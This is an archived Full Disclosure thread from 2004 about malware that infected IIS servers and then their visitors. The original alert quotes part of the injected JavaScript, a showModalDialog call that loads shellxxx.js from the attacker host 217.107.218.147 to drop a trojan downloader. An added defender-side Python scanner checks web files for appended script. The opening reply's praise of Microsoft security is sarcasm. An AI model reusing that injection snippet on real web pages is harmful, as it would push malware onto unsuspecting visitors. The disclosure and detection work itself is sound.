Full Disclosure mailing list archives
Re: New malware to infect IIS and from there jump to clients
From: <bills.bitch () hushmail com>
Date: Fri, 25 Jun 2004 08:01:33 -0700
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This is impossible. Microsoft products are inherently secure. We have a patched IIS as stated by the alert, an alpha security patch for the operating system and open holes in the browser. No doubt this is a vicious anti-Microsoft attempt to discredit their security commitments by people who are jealous of Bill Gates' wealth. That or maybe by disgruntled individuals who failed to earn their MVP status.

For the IIS side....

http://www.microsoft.com/security/incident/download_ject.mspx

Microsoft teams are investigating a report of a security issue affecting customers using Microsoft Internet Information Services 5.0 (IIS) and Microsoft Internet Explorer, components of Windows.

Important

Customers who have deployed Windows XP Service Pack 2 RC2 are not at risk.

Reports indicate that Web servers running Windows 2000 Server and IIS that have not applied update 835732, which was addressed by Microsoft Security Bulletin MS04-011, are possibly being compromised and being used to attempt to infect users of Internet Explorer with malicious code.

-----Original Message-----
From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of Peter Kruse
Sent: Thursday, June 24, 2004 7:22 PM
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] New malware to infect IIS and from there jump to clients

Hi all,

This is a heads up.

A new malware has been reported from several sources so it appears to be fairly widespread already.

The malware spreads from infected IIS servers to clients that visit the webpage of the infected server. How the IIS servers were compromised in the first place is unfortunately still unknown (any info on that would be appreciated).

The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does so by running a javascript that apparently gets appended to several files in the webfolder of IIS (eg. html, .txt, .gif).

The webpage loads http:// 217.107.218.147/xxx.html that contains the following code:

<script language="Javascript">
function InjectedDuringRedirection(){
showModalDialog('md.htm', window, "dialog Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width :1\;").location= " java script:'<SCRIPT SRC =\\' http:// 217.107.218.147/shellxxx.js\\'> <\ /script>'";

[snip - you get the picture, right?]

I had to put in some spaces to get past trivial content filtering.

From that point it will try to run the malware in a 1x1 dialogbox in the following order:

shellscript_loadxxx.js
shellxxx.js

The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a trojan-downloader and run it.

Consider to deny access to http://217.107.218.147 in your firewall. This will at least prevent client PCs from getting infected.

Further information can be found in the daily log from SANS: http://isc.sans.org/

Regards
Peter Kruse
http://www.csis.dk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkDcPmgACgkQ9hJzGKhH2Ld2CgCguxLYUab6EyIAef5qK5YVBK3JDX0A
n1iDB7VSzmP2NVQyeldO+9agWW8q
=Uc5R
-----END PGP SIGNATURE-----
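
Added example, not part of the original post or thread: a defender-side check for the behaviour Peter Kruse describes, where script gets appended to files in the IIS web folder (html, .txt, .gif). The only value taken from the post is the redirect host; the 4 KiB tail window, the extension list, the reason labels and the function names are assumptions, and the sample files are constructed, inert stand-ins.

```python
import re
import tempfile
from pathlib import Path

REDIRECT_HOST = b"217.107.218.147"      # indicator quoted in the post
TAIL_BYTES = 4096                       # assumption: appended script sits in the last 4 KiB
SCRIPT_TAG = re.compile(rb"<\s*script\b", re.IGNORECASE)
HTML_END = re.compile(rb"</\s*html\s*>", re.IGNORECASE)
MARKUP_EXT = {".htm", ".html", ".asp"}  # assumption: types that may legitimately hold script


def classify(path):
    """Return the reasons a file's tail looks like it had script appended."""
    path = Path(path)
    with path.open("rb") as fh:
        fh.seek(max(path.stat().st_size - TAIL_BYTES, 0))
        tail = fh.read()
    reasons = ["redirect-host"] if REDIRECT_HOST in tail else []
    if path.suffix.lower() in MARKUP_EXT:
        # Legitimate script sits inside the document; flag tags after the last </html>.
        ends = list(HTML_END.finditer(tail))
        if ends and SCRIPT_TAG.search(tail, ends[-1].end()):
            reasons.append("script-after-html-end")
    elif SCRIPT_TAG.search(tail):
        # .gif, .txt and similar static content should never end in a script tag.
        reasons.append("script-in-static-file")
    return reasons


def scan_webroot(root):
    """Map relative path -> reasons for every suspicious file under root."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        reasons = classify(path) if path.is_file() else []
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings


def demo():
    """Scan a constructed web folder (inert stand-ins, not real samples)."""
    footer = b"\n<script>/* constructed footer, host 217.107.218.147 */</script>"
    clean = b"<html><head><script>var a=1;</script></head><body>ok</body></html>"
    samples = {"index.html": clean, "news.html": clean + footer,
               "logo.gif": b"GIF89a\x01\x00\x01\x00" + footer, "readme.txt": b"plain text\n"}
    with tempfile.TemporaryDirectory() as root:
        for name, data in samples.items():
            Path(root, name).write_bytes(data)
        return scan_webroot(root)
```

Run scan_webroot() against a copy of the web folder and compare any flagged file with a known-good backup; a footer larger than the tail window would need a bigger TAIL_BYTES.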
Current thread:
- Re: New malware to infect IIS and from there jump to clients bills.bitch (Jun 25)